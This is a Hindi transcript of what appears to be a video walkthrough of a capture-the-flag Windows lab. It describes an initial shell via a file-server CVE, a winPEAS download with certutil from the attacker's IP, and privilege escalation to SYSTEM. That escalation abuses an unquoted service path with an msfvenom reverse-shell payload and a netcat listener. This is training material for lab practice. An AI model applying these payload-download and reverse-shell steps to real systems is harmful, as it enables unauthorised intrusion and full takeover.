पे, तो यहाँ पे ये इन्होंने ये भी कमेंट डाला हुआ है, यू मे नीड टू रन इट मल्टीपल टाइम्स फॉर सक्सेस। तो मल्टीपल टाइम्स आपको रन करना पड़ सकता है, तो दोबारा रन कर लेते हैं। और जैसे ही मैंने दोबारा रन किया तो आप यहाँ पे देखोगे तो यहाँ पे ये कनेक्ट कर गया अब। और यहाँ पे आपको दिख जाएगा कि सी यूजर बिल और वगैरह वगैरह। तो इस तरीके से अब हमको शेल मिल चुका है इस सिस्टम पे, हमारे विक्टिम पे। ऑलराइट, तो यहाँ पे हम देख सकते हैं अब जैसे कि कुछ क्वेश्चन हैं उनके आंसर भी कर देते हैं। तो सबसे पहले पूछा स्कैन द मशीन विद nmap एंड व्हाट पोर्ट रनिंग अ वेब सर्वर ऑन, व्हाट इज द अदर पोर्ट बोला है तो 8080। तो उसके बाद टेक अ लुक एट द वेब सर्वर एंड व्हाट इज द फाइल सर्वर इज रनिंग, फाइल सर्वर क्या रन कर रहा है। तो ये हमारा रन कर रहा था, अगर मैं इसको प्रॉपरली आंसर कर सकूं। ओके, जेटो एचटीटीपी फाइल सर्वर, तो एग्जैक्ट नाम ढूंढना दिक्कत है। ओके, उसके बाद ये इन्होंने पूछा सीवी नंबर क्या था एक्सप्लॉइट का। तो सीवी नंबर हमने यही वाला यूज किया, हाँ हमने यही वाला यूज किया। तो ये हमारा सीवी नंबर है, तो इसको सिंपल इस तरीके से कर लेंगे कॉपी, और इस तरीके से कर देंगे आंसर। नेक्स्ट, यूज मेटास्प्लॉइट टू गेन अ शेल, व्हाट इज द यूजर फ्लैग। तो हमने मेटास्प्लॉइट का यूज नहीं किया। मेटास्प्लॉइट का यूज करना ज्यादा इजी है एज कम्पेयर टू ये वाला। इसके अंदर भी कुछ ज्यादा मुश्किल नहीं थी, बट हाँ मेटास्प्लॉइट के अंदर आपको सिर्फ सर्च करना एक्सप्लॉइट और कमांड डालनी है रिमोट होस्ट की और आपको एग्जीक्यूट कर देना, आपका काम बन जाएगा। इस सिनेरियो में थोड़ा डिफरेंट था, पर ये चीज हमने मेटास्प्लॉइट से नहीं की, बट स्टिल हम यूजर फ्लैग तो ले ही सकते हैं। तो यूजर फ्लैग कहाँ पे मिलेगा, तो यूजर फ्लैग के लिए अब दोबारा चलते हैं अपने इस पे, और सी डी सी इस तरीके से सी डी यूजर्स और डी आई आर, और यहाँ पे आप देखोगे तो बिल नाम की डायरेक्टरी के बिल के अंदर मूव कर जाते हैं, डी आर और डेस्कटॉप, और यहाँ पे ये हमारा यूजर फ्लैग है। तो मोर कमांड के साथ हम इसको रीड कर सकते हैं, डॉट टी एक्स टी। यहाँ पे ये हमारा हो गया फ्लैग रेडी, ये वाला भी। ओके, नेक्स्ट हम है प्रिविलेज एस्केलेशन। तो प्रिविलेज एस्केलेशन अगर मैं आपको यहाँ पे दिखाऊं तो प्रिविलेज एस्केलेशन के लिए यहाँ पे इन्होंने बताया हुआ है
कि हम इसको फर्दर एन्यूमरेट कर सकते हैं और ये काम करवा सकते हैं। और यहाँ पे ये मीटर प्रीटर का यूज कर रहे हैं, मतलब मेटास्प्लॉइट का यूज कर रहे हैं। हम मेटास्प्लॉइट का यूज नहीं करेंगे। तो इसको कर देता हूँ मैं हाइड। और यहाँ पे क्या करूंगा, यहाँ पे सिंपल सबसे पहला काम मेरा क्या है, सबसे पहला काम मैं, हमारा एक टूल होता है विनपीस, हम विनपीस को डाउनलोड कर लेंगे। तो विनपीस डाउनलोड कहाँ से करना है, तो आप सिंपल यहाँ पे आ सकते हो गूगल पे और सर्च कर सकते हो डाउनलोड विनपीस। और आपको पहले नंबर पे मिल जाएगा जो गिटहब का रिजल्ट, पीस एनजी से, इस पे क्लिक करेंगे हम। और जैसे ही इस पे क्लिक करोगे तो आपको यहाँ पे विनपीस की डिफरेंट डिफरेंट इंफॉर्मेशन मिल जाएगी। जैसे कि विन पीस का ये मेन फोल्डर है, इसके अंदर विन पीस EXE, विन पीस पावर शेल, विन पीस बैट, विन पीस बैट यूज कर सकते हो चाहते हो तो। और यहाँ पे इधर आके सिंपल इस पे क्लिक करके इसको आप डाउनलोड कर सकते हो, ये पूरा का पूरा कोड। ठीक है, विन पीस डाउनलोड आप ऐसे कर सकते हो। मेरे सिनेरियो में ऑलरेडी विन पीस है मेरे पास, तो मैं डाउनलोड तो नहीं करने वाला। तो यहाँ पे इसको करता हूँ क्लोज, और यहाँ पे CD/OPT/LS पीस ANG के ऊपर पड़ा है हमारा CD विन पीस, बस CD विन पीस बैट। तो आप देखोगे तो ये मैंने सेम ही गेट रिपोजिटरी मैंने क्लोन की हुई है अपने सिस्टम पे, तो ये सेम ही है। ठीक है, तो विन पीस बैट LS, ओके। तो यहाँ पे सिंपल इस तरीके से पाइथन का सर्वर दोबारा होस्ट कर देते हैं हम, ताकि हम विनपीस को डाउनलोड कर सकते हैं। एक बार कॉपी कर लेता हूँ इस नाम को, विनपीस डॉट बैट है जो, ओके, एंड पाइथन। अब हम लिसन कर रहे हैं, अब यहाँ पे चलते हैं इस सर्वर पे, और यहाँ पे CD C, और यहाँ पे mkdir कमांड यूज करके एक टेम्प नाम की डायरेक्टरी बना लेता हूँ, और टेम्प के अंदर मूव कर जाता हूँ। और यहाँ पे डाउनलोड कर लेता हूँ हमारा विन पीस। तो कैसे डाउनलोड करना है, कमांड होती है जब विंडोज में आप कुछ भी डाउनलोड करते हो, तो विंडोज में डाउनलोड करने के लिए आपकी कमांड होती है cert util .exe -url cache -f, उसके बाद आपका जिस पे वेब सर्वर होस्ट कर रहा है उसका IP एड्रेस, जो कि है 10.6.38.241। और उसके बाद जो फाइल हमें डाउनलोड करनी है वो है हमारी विन पीस। उसके बाद हमको जो नाम रखना है उसका फाइल का अपने सिस्टम पे, वो एंटर। ओके, तो यहाँ पे ये चीज़ मैंने गलत कर दी, तो लेट्स वेट। और हमारा शेल खराब हो गया, दोबारा दोबारा हमको शेल एग्जीक्यूट करना पड़ेगा। ओके, तो एक बार दोबारा शेल ले लेते हैं। यहाँ पे शेल मिल गया, इसको कर देते हैं क्लोज। और psng, हम जाना विन पीस पे, पाइथन इस तरीके से cdc temp ls विंडोज नहीं, विंडोज है सॉरी। ओके, cert util .exe -url cache -f http, और IP है 10.6.38.241। फाइल का नाम है विनपीस, और डाउनलोड नाम हम विनपीस डॉट बैट रख देते हैं इस तरीके से। और यहाँ पे कमांड सक्सेसफुली कंप्लीट होगी, और यहाँ पे हमको दिख जाएगा ये गेट भी हुई है। ठीक है, और dir करूँगा तो यहाँ पे विनपीस आ गया होगा। तो विनपीस को सिंपल इस तरीके से रन कर लेंगे, विनपीस डॉट बैट, और यहाँ पे हमारा विन पीस स्टार्ट हो गया। तो ये पूरे सिस्टम को एनुमरेट करेगा, मेन मेन चीजें ढूंढेगा जो कि हमारी सिस्टम पे मिसकॉन्फ़िगर्ड हो सकती हैं, जिनको हम आगे जाके प्रिविलेज एस्केलेशन के लिए यूज कर सकते हैं। तो ये एक काइंड ऑफ ऑटोमेटेड टूल है, मैनुअली आप कर सकते हो। मैनुअली इतनी सारी चीजें ढूंढने में टाइम लगता है, तो विनपीस एक गुड ऑप्शन हो सकता है आपके लिए। और अगर आप मेटास्प्लॉइट के थ्रू कर रहे हो, तो मेटास्प्लॉइट के थ्रू आप अपलोड कर सकते हो
सेम विनपीस टूल एनुमरेट कर सकते हो फर्दर इसको रन करके, बट हाँ ये भी एक वन ऑफ द इजीएस्ट वे आप अगर यूज करना चाहते हो तो एक बार आपने ये यहाँ तक कर लिया ना, एक बार आपने इसको एनुमरेट कर लिया प्रॉपर, तो उसके बाद मैं क्या रिकमेंड करूंगा, वीडियो को यहीं पे पॉज करें, उसके बाद आप गो थ्रू करें इस पूरी, जितनी भी इंफॉर्मेशन आपको यहाँ पे मिलेगी ना, इसके थ्रू जाएं, इसके थ्रू फाइंड करें क्या क्या पोटेंशियल प्रिविलेज एस्केलेशन वेक्टर्स हो सकते हैं और कैसे हम इस सिस्टम को प्रिविलेज एस्केलेट कर सकते हैं। ऑलराइट, तो यहाँ पे अभी ये रन हो रहा है। तो एक बार ये फिनिश हो जाएगा एंड आई बिलीव आपने वीडियो को पॉज किया होगा और आपने खुद भी इसके थ्रू गो थ्रू किया होगा, आपने देखा होगा कि क्या क्या चीजें इसके अंदर मिसकॉन्फ़िगर्ड है या किसके थ्रू हम प्रिविलेज एस्केलेट कर सकते हैं। इन केस अगर आप नहीं कर पाए तो फॉलो अलोंग, और यहाँ पे जैसे ही आप विन पीस के रिजल्ट्स के थ्रू जाओगे तो यहाँ पे आपको एक तरीके की वल्नरेबिलिटी मिलती है अगर हमारे पास कोई सर्विस है जो कि अनकोटेड सर्विस पाथ के अंदर है, जैसे कि यहाँ पे आप देखोगे अनकोटेड सर्विस पाथ। अनकोटेड सर्विस पाथ क्या होता है? अनकोटेड सर्विस पाथ होता है कि फॉर एग्जांपल आपकी जैसे कि ये, अब कोई भी फाइल होती है, कोई भी फोल्डर होता है आपके सिस्टम पे, यहाँ पे इन्होंने एग्जांपल भी दिया है, व्हेन पाथ इज नॉट कोटेड सिंपल, ठीक है, जैसे कि यहाँ पे प्रोग्राम फाइल्स, यहाँ पे सॉफ्ट, और यहाँ पे एक न्यू फोल्डर नाम का है। अब यहाँ पे न्यू, उसके बाद फोल्डर के बीच में जो है स्पेस है। अब अगर ये कोट नहीं लगे हुए इसके आसपास, जैसे कि इस सिनेरियो में इसके आसपास कोट नहीं लगे हुए, तो यहाँ पे सिस्टम क्या करेगा, सिस्टम जाएगा सी के अंदर, प्रोग्राम फाइल्स के अंदर, उसके बाद सॉफ्ट के अंदर, उसके बाद न्यू के बाद ये स्पेस देखेगा तो ये क्या करेगा, न्यू को रन करेगा। उसके बाद न्यू के साथ अगर और कुछ अवेलेबल है न्यू नाम का इस सॉफ्ट के अंदर तो उसको रन करेगा। अगर वट इफ अगर हम न्यू के बाद यहाँ पे सॉफ्ट फोल्डर के अंदर न्यू डॉट ई डाल दें तो बेसिकली वो न्यू डॉट ई को एग्जीक्यूट कर देगा, आगे जाएगा ही नहीं। तो ये अनक्यूटेड सर्विस पाथ है। तो फिक्स क्या है इसका, इसका परमानेंट फिक्स होगा कुछ ऐसा दिखना चाहिए ये। अगर जैसे कि यहाँ पे इन्होंने बताया न्यू डॉट ई, ओके मैं सही नहीं समझा रहा था आपको, देन सी प्रोग्राम फाइल्स और इस तरीके से एग्जीक्यूट कर गया। तो यहाँ पे अगर हम नीचे जाएं तो यहाँ पे ये बताया हुआ अनकोटेड सर्विस पाथ के लिए कौन कौन सी हमारे पास अवेलेबल है जिनको हम प्रॉब्ली एग्जीक्यूट अब्यूज कर सकते हैं। सबसे पहले आती है हमारी एडवांस सिस्टम केयर सर्विस 9, जो कि है इस तरीके से। तो यहाँ पे आप देखोगे एडवांस सिस्टम केयर नाम का जो फोल्डर है, इन दोनों के बीच में स्पेस है और ये अनकोटेड नहीं है, इनकी साइड में कोट्स नहीं लगे हैं, मतलब कि ये एक वल्नरेबल सर्विस है। तो इसको कर लेंगे हम कॉपी और इसको यहाँ पे अपने नोट्स में सेव कर लेंगे, और इसके बाद मैं इसका पाथ भी सेव कर लूंगा क्योंकि पाथ भी हमको चाहिए, तो पाथ को भी इस तरीके से सेव कर लेते हैं। अब यहाँ पे आप देखोगे यहाँ पे दूसरी भी है, जैसे कि AWS लाइट देखोगे, तो AWS लाइट भी इसने फ्लैग की, बट हमारे सिनेरियो में AWS लाइट काम नहीं करेगी क्योंकि ये सर्विस के बीच में कोई, अब आप प्रोग्राम फाइल्स को एज अनकोटेड नहीं देख रहे क्योंकि ये ठीक है, कोई दिक्कत नहीं है इसमें। ऑलराइट, तो यहाँ पे ये जो है हमारा आईओ बिट यूनी एसवीआर, ये अनकोटेड है। अगर आईओ बिट और यू अनइंस्टॉलर के बीच में आप स्पेस देखोगे ना तो ये कोटेड नहीं है, तो इस सिनेरियो में ये भी अब्यूज की जा सकती है। एंड उसके बाद बस, ठीक है। तो अब इसको आगे फर्दर काम कैसे करना है इसके साथ, तो फर्दर काम इसके साथ सबसे पहले हम देखेंगे सर्विस का स्टेटस क्या है, ठीक है। तो सर्विस का स्टेटस चेक करने के लिए हमारी कमांड होती है SC क्वेरी वाली। SC मतलब कि मैं चला के दिखाता हूँ, यहाँ पे सर्विस का नाम जो है ना ये कॉपी कर लेता हूँ सबसे पहले, और यहाँ पे कमांड डालता हूँ SC और पेस्ट कर देता हूँ सर्विस का नाम जो भी है और एंटर। तो यहाँ पे बता देगा सर्विस क्या है, सर्विस का नाम ये है, टाइप क्या है, ये टाइप है सर्विस का जो भी है, स्टार्ट टाइप ऑटो स्टार्ट पे सेटअप की गई है सर्विस। उसके बाद बाइनरी पाथ दिया हुआ है, इस लोकेशन दी हुई है, सर्विस की लोकेशन कहाँ पे है। सिस्टम रिजर्व्ड सर्विस सर्विस है, मतलब कि प्रॉबेबल चांसेस हैं सिस्टम एज ए एंटी अथॉरिटी सिस्टम रन की जा रही है। एंड देन लोकल सिस्टम नेम, ठीक है,
तो अब हम चेक कैसे करेंगे कि हमारे पास परमिशन है इस सर्विस को स्टार्ट या स्टॉप करने की। तो यहाँ पे हमारी कमांड होती है नेट स्टॉप। ठीक है, नेट स्टॉप, उसके बाद सर्विस का नाम डालोगे तो वो सर्विस स्टॉप हो जाती है। तो अगर मैं फॉर एग्जांपल यहाँ पे इस तरीके से नेट स्टॉप इस सर्विस का नाम डालता हूँ, एंटर मारता हूँ, तो यहाँ पे देखोगे एडवांस सिस्टम केयर सर्विस वाज स्टॉप्ड सक्सेसफुली। मतलब कि एज अ बिल, मतलब बिल यूजर के साथ मैं इस सर्विस को स्टॉप कर पा रहा हूँ। अगर मैं नेट स्टार्ट की बात करूँ तो लेट्स सी अगर मैं स्टार्ट कर पाता हूँ कि नहीं, और यहाँ पे स्टार्ट भी कर पा रहा हूँ, मतलब कि मैं मेरा काइंड ऑफ कंट्रोल है इस सर्विस पे। मतलब कि मैं सर्विस को स्टॉप भी कर सकता हूँ, स्टार्ट भी कर सकता हूँ। तो क्या करूंगा मैं, नेट स्टॉप और सर्विस को कर देता हूँ स्टॉप, पेस्ट। तो यहाँ पे हमारी सर्विस होगी स्टॉप। अब मैं एक पेलोड बनाऊंगा, एमएसएफ वेनम का यूज कर लूंगा मैं, ठीक है। तो यहाँ पे अपने टर्मिनल पे आते हैं, एमएसएफ वेनम डैश पी विंडोज x64 शेल रिवर्स टीसीपी, इस तरीके से। और यहाँ पे आप देखो तो मैंने पहले लैब की हुई है, तो यहाँ पे ये इस तरीके से बता रहा है, तो इसी तरीके से आपको कमांड यूज करनी है। यहाँ पे देखोगे अब हम क्या करेंगे, अब यहाँ पे आप फाइल की, अब आपको पेलोड ना ऐसे ही बनाना है जैसे मैंने यहाँ पे बनाया है, एडवांस डॉट ई नाम रखना है इसका। क्यों रखना है, क्योंकि यहाँ पे आप बाइनरी का पाथ देखोगे, जब हम सर्विस को स्टॉप करते हैं तो सर्विस स्टॉप हो जाती है, जब हम सर्विस को स्टार्ट करते हैं तो आपका सिस्टम क्या करता है, आपका सिस्टम इस लोकेशन पे जाता है और ये वाली जो ई फाइल है इसको एग्जीक्यूट करता है, क्योंकि वो इस सर्विस के साथ लिंक्ड है। और जब आपकी सर्विस हो जाती है स्टार्ट, अब जब हम इस सर्विस को, अब हमने इस टाइम इस सर्विस को स्टॉप कर दिया, अब जब हम क्या करेंगे, हम यहाँ पे पेलोड जनरेट कर देंगे। तो यहाँ पे हमने ये पेलोड इस तरीके से कर दिया जनरेट। तो पेलोड जनरेट कर देंगे, उसके बाद इस पेलोड को इस सिस्टम पे हम डाउनलोड कर लेंगे, और उसके बाद इस पेलोड को हम इस लोकेशन पे आईओबिट नाम के फोल्डर के अंदर डाल देंगे। और पेलोड का नाम क्या है, एडवांस्ड डॉट टी। तो जैसे ही हम इस सर्विस को उसके बाद स्टार्ट करेंगे तो सर्विस क्या करेगी, सर्विस इस लोकेशन पे जाएगी, आईओबिट के अंदर जाएगी और देखेगी ओके आईओबिट के अंदर एडवांस और सिस्टम केयर के बीच में स्पेस है। तो लेट्स सी अगर एडवांस डॉट नाम का कुछ पड़ा है इसके अंदर। अब क्योंकि हमारे सिनेरियो में पड़ा है, हम डालेंगे तो वो उसको ही एग्जीक्यूट कर देगी और आगे जाएगी नहीं। तो ये इस तरीके से अब्यूज की जाएगी, सिंपल। ठीक है, तो यहाँ पे क्या करता हूँ मैं, दोबारा सर्वर को यहाँ पे देखते हैं, तो हमारा पाइथन का सर्वर रन हो रहा है, पर ये डाउनलोड्स फोल्डर में है, तो डाउनलोड फोल्डर में ही है, तो डाउनलोड फोल्डर में चल जाते हैं। तो यहाँ पे एडवांस डॉट नाम को फाइल है, तो पाइथन सर्वर होस्ट कर देते हैं दोबारा, और एडवांस डॉट को कॉपी कर लेता हूँ और यहाँ पे मैं मूव कर जाता हूँ। तो मूव कहाँ करूंगा, मैं इस लोकेशन पे मूव कर जाऊंगा सीधा। ठीक है, तो सी डी एंड आई नीड दिस, पेस्ट डी आई आर। और यहाँ पे आप देखोगे तो यहाँ पे अभी कुछ भी नहीं है। अब यहाँ पे हम उस एडवांस डॉट को डाउनलोड कर लेंगे, cert util डॉट डैश url कैश डैश f http 10.6.38.241। ये डाउनलोड हो गया। अब मेक श्योर आपका नाम सेम होना चाहिए। नाम सेम इसलिए होना चाहिए क्योंकि आयोबिट के अंदर जो एडवांस नाम का फोल्डर है ना, ये वाला, इनके बीच में स्पेस है, तो एडवांस्ड डॉट जगह कुछ और होता तो दिक्कत है। राइट, अब यहाँ पे हम नेटकैट का लिसनर स्टार्ट करेंगे क्योंकि हम लिसन करना चाहते हैं। तो अब मैं यहाँ पे लिसन करूंगा 4444 पे, 444 पे क्यों, क्योंकि यहाँ पे मैंने एमएसएफ बैनम के पेलोड में बताया था ये वाला पोर्ट यूज करना। ओके, तो अब मैं अगर नेट स्टार्ट और हमारी जो सर्विस है ये सर्विस का नाम है, इस तरीके से कर दूं। अब ये पॉज हो गया है, मतलब पॉज हो गया, मतलब कि यहाँ पे हमको शेल मिल चुका है विंडोज 32 के अंदर। वो एम आई करूंगा तो मैं एंटी अथॉरिटी सिस्टम हूँ, तो मतलब कि मैं फुल प्रिविलेज्ड यूजर हूँ इस सिस्टम के ऊपर अपना। तो यहाँ पे हम फ्लैग्स भी ढूंढ लेते हैं अपने, तो बचे कुछ फ्लैग जो है, तो क्लोज अटेंशन कैन रजिस्टार्ट। तो यहाँ पे सर्विस का नाम पूछ रहे हैं जो हम सर्विस, अब यहाँ पे इन्होंने मेटास्प्लॉट के थ्रू किया है, आप इसके थ्रू जा सकते हैं। और यहाँ पे इन्होंने
ये वाला मेथड भी बताया जिसके थ्रू हम ये काम भी कर सकते हैं। ओके, तो यहाँ पे फ्लैग्स क्या है, सबसे पहले कौन सी सर्विस है, तो हमारी सर्विस का नाम क्या था, तो सर्विस का नाम ये रहा। और ये रूट फ्लैग मांग रहा है, रूट फ्लैग हम दे देंगे, रूट फ्लैग हमको मिलेगा एडमिन यूजर के अंदर, एडमिनिस्ट्रेटर। ओके, तो यहाँ पे एक्सेस डिनाइड आ रहा है, मतलब कि अभी भी हमारे पास परमिशन नहीं है इस फोल्डर को एक्सेस करने के लिए। तो लेट्स सी हम क्या कर सकते हैं इसके बाद, नेट लोकल ग्रुप, और हमारे पास ये है नेट लोकल ग्रुप एडमिनिस्ट्रेटर्स। ओह ओके, तो यहाँ पे मैं बताता हूँ मैं क्या कर रहा था। तो मेरे पास दोनों शेल है ना, वो कंफ्यूज हो गया थोड़ा। तो मैं इस वक्त ये सब कुछ कर रहा था इस शेल से, तो यहाँ पे आप देखोगे तो यहाँ पे लेफ्ट वाला जो है ना, ये वाला, ये मेरा बिल यूजर है, तो इसलिए काम नहीं किया, तो हमें एक्सेस डिनाइड आ रहा था। तो यहाँ पे दिखा रहा है ये बिल नाम का यूजर है, क्योंकि बिल के थ्रू हम एक्सेस नहीं कर सकते, बट यहाँ पे हम एंटी अथॉरिटी सिस्टम है, इसके थ्रू हम जरूर कर सकते हैं। सी डी यूजर्स, सी डी एडमिनिस्ट्रेटर, एंड ये यार सी डी डेस्कटॉप एंड यार, और यहाँ पे रूट डॉट टी एक्स टी पड़ा है, और ये हो गया हमारा फ्लैग कंप्लीट। ओके, और आप इसके थ्रू भी जा सकते हो, अगर आप जाते हो तो पावर शेल कमांड हेयर, व्हाट इज पावर शेल कमांड वी रन थ्रू मैनुअली फाइंड आउट दिस सर्विस। ओके, तो इन्होंने पावर शेल का यूज़ किया इसके लिए, तो आई वुड रिकमेंड गो थ्रू दिस, अगर आप इस चीज़ को देख सकते हो तो इसके थ्रू आप जा सकते हो और इसको कर सकते हो, बट हाँ, ये वन ऑफ द वे आप इस सिस्टम को जो है एस्केलेट कर सकते हो। तो इस वीडियो में बस इतने ही, वीडियो को लाइक करें ना भूलें, चैनल को सब्सक्राइब करें, मैं मिलता हूँ आपको नेक्स्ट वीडियो में।